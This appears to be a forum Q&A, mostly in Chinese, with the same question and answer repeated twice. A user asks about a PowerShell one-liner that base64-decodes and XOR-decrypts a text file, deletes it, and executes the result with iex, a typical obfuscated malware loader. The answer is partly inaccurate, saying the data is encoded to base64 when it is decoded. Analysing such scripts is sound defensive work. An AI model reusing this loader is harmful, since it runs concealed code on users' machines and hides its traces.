有人可以帮我理解这个 PowerShell 脚本在做什么吗?
Can someone help me understand what this PowerShell script is doing?
有人可以帮助确定这个脚本正在执行什么吗?它是从 .txt 文件中解码其 base64,并收集系统 IO,还是没有足够的上下文?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\usera54473f352d947ea77fc3e8c2637d39.txt';$xk='tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
此 PowerShell 脚本读取文件 (C:\Users\usera54473f352d947ea77fc3e8c2637d39.txt) 并将文件转换为 Base64 编码字符串。之后,它以tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW为密钥,对数据进行异或,实质上是解密文件中的数据。之后,执行解密的文本,这意味着该文件应包含一些加密形式的 PowerShell 命令,此脚本才能运行。该文件在读取后也会被删除。
有人可以帮助确定这个脚本正在执行什么吗?它是从 .txt 文件中解码其 base64,并收集系统 IO,还是没有足够的上下文?
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\usera54473f352d947ea77fc3e8c2637d39.txt';$xk='tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
此 PowerShell 脚本读取文件 (C:\Users\usera54473f352d947ea77fc3e8c2637d39.txt) 并将文件转换为 Base64 编码字符串。之后,它以tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW为密钥,对数据进行异或,实质上是解密文件中的数据。之后,执行解密的文本,这意味着该文件应包含一些加密形式的 PowerShell 命令,此脚本才能运行。该文件在读取后也会被删除。